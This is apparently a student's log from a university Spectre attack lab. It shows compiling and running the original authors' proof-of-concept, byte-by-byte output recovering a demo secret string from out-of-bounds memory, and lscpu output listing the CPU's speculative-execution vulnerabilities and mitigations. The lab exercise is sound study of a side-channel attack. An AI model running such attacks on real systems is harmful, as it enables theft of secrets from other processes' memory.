SSI 2024/25
Lab 1. Spectre attack Lab
JMCruz

compiling and running of the C code from Spectre's authors:
(https://arxiv.org/abs/1801.01203)
============================================================================================
--------------------------------------------------------------------------------------------
jmcruz$ cc -Wall spectre-originalAuthors.c
spectre-originalAuthors.c: In function ‘readMemoryByte’:
spectre-originalAuthors.c:76:42: warning: pointer targets in passing argument 1 of ‘__rdtscp’ differ in signedness [-Wpointer-sign]
   76 |                         time1 = __rdtscp(&junk);
      |                                          ^~~~~
      |                                          |
      |                                          int *
In file included from /usr/lib/gcc/x86_64-linux-gnu/11/include/x86gprintrin.h:33,
                 from /usr/lib/gcc/x86_64-linux-gnu/11/include/x86intrin.h:27,
                 from spectre-originalAuthors.c:16:
/usr/lib/gcc/x86_64-linux-gnu/11/include/ia32intrin.h:122:25: note: expected ‘unsigned int *’ but argument is of type ‘int *’
  122 | __rdtscp (unsigned int *__A)
      |           ~~~~~~~~~~~~~~^~~
spectre-originalAuthors.c:79:42: warning: pointer targets in passing argument 1 of ‘__rdtscp’ differ in signedness [-Wpointer-sign]
   79 |                         time2 = __rdtscp(&junk) - time1; /* Compute elapsed time */
      |                                          ^~~~~
      |                                          |
      |                                          int *
In file included from /usr/lib/gcc/x86_64-linux-gnu/11/include/x86gprintrin.h:33,
                 from /usr/lib/gcc/x86_64-linux-gnu/11/include/x86intrin.h:27,
                 from spectre-originalAuthors.c:16:
/usr/lib/gcc/x86_64-linux-gnu/11/include/ia32intrin.h:122:25: note: expected ‘unsigned int *’ but argument is of type ‘int *’
  122 | __rdtscp (unsigned int *__A)
      |           ~~~~~~~~~~~~~~^~~
jmcruz$ ./a.out
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffffdfe8... Unclear: 0x54='T' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdfe9... Unclear: 0x68='h' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfea... Unclear: 0x65='e' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdfeb... Unclear: 0x20=' ' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfec... Unclear: 0x4D='M' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfed... Unclear: 0x61='a' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffdfee... Unclear: 0x67='g' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfef... Unclear: 0x69='i' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdff0... Unclear: 0x63='c' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdff1... Unclear: 0x00='?' score=998(second best: 0x20 score=998)
Reading at malicious_x = 0xffffffffffffdff2... Unclear: 0x57='W' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffdff3... Unclear: 0x6F='o' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffdff4... Unclear: 0x72='r' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffdff5... Unclear: 0x64='d' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdff6... Unclear: 0x73='s' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdff7... Unclear: 0x20=' ' score=999(second best: 0x00 score=997)
Reading at malicious_x = 0xffffffffffffdff8... Unclear: 0x61='a' score=999(second best: 0x00 score=995)
Reading at malicious_x = 0xffffffffffffdff9... Unclear: 0x72='r' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdffa... Unclear: 0x65='e' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdffb... Unclear: 0x20=' ' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdffc... Unclear: 0x53='S' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdffd... Unclear: 0x71='q' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdffe... Unclear: 0x75='u' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfff... Unclear: 0x65='e' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe000... Unclear: 0x61='a' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe001... Unclear: 0x6D='m' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffe002... Unclear: 0x69='i' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe003... Unclear: 0x73='s' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffe004... Unclear: 0x68='h' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe005... Unclear: 0x20=' ' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe006... Unclear: 0x4F='O' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe007... Unclear: 0x73='s' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe008... Unclear: 0x73='s' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffe009... Unclear: 0x69='i' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffe00a... Unclear: 0x66='f' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe00b... Unclear: 0x72='r' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffe00c... Unclear: 0x61='a' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe00d... Unclear: 0x67='g' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffe00e... Unclear: 0x65='e' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffe00f... Unclear: 0x2E='.' score=999(second best: 0x00 score=996)
jmcruz$
--------------------------------------------------------------------------------------------
============================================================================================
Recovered Secret: The Magic?Words are Squeamish Ossifrage.
============================================================================================
--------------------------------------------------------------------------------------------
jmcruz$ uname -a
Linux ricjoa 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
jmcruz$ lscpu
Architecture:             x86_64
  CPU op-mode(s):         32-bit, 64-bit
  Address sizes:          39 bits physical, 48 bits virtual
  Byte Order:             Little Endian
CPU(s):                   8
  On-line CPU(s) list:    0-7
Vendor ID:                GenuineIntel
  Model name:             Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
    CPU family:           6
    Model:                60
    Thread(s) per core:   2
    Core(s) per socket:   4
    Socket(s):            1
    Stepping:             3
    CPU max MHz:          4000,0000
    CPU min MHz:          800,0000
    BogoMIPS:             7183.33
    Flags:                fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm cpuid_fault epb invpcid_single pti ssbd ibrs ibpb stibp tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt dtherm ida arat pln pts md_clear flush_l1d
Virtualization features:
  Virtualization:         VT-x
Caches (sum of all):
  L1d:                    128 KiB (4 instances)
  L1i:                    128 KiB (4 instances)
  L2:                     1 MiB (4 instances)
  L3:                     8 MiB (1 instance)
NUMA:
  NUMA node(s):           1
  NUMA node0 CPU(s):      0-7
Vulnerabilities:
  Gather data sampling:   Not affected
  Itlb multihit:          KVM: Mitigation: VMX disabled
  L1tf:                   Mitigation; PTE Inversion; VMX conditional cache flushes, SMT vulnerable
  Mds:                    Mitigation; Clear CPU buffers; SMT vulnerable
  Meltdown:               Mitigation; PTI
  Mmio stale data:        Unknown: No mitigations
  Reg file data sampling: Not affected
  Retbleed:               Not affected
  Spec rstack overflow:   Not affected
  Spec store bypass:      Mitigation; Speculative Store Bypass disabled via prctl and seccomp
  Spectre v1:             Mitigation; usercopy/swapgs barriers and __user pointer sanitization
  Spectre v2:             Mitigation; Retpolines; IBPB conditional; IBRS_FW; STIBP conditional; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected
  Srbds:                  Mitigation; Microcode
  Tsx async abort:        Not affected
jmcruz$
--------------------------------------------------------------------------------------------
============================================================================================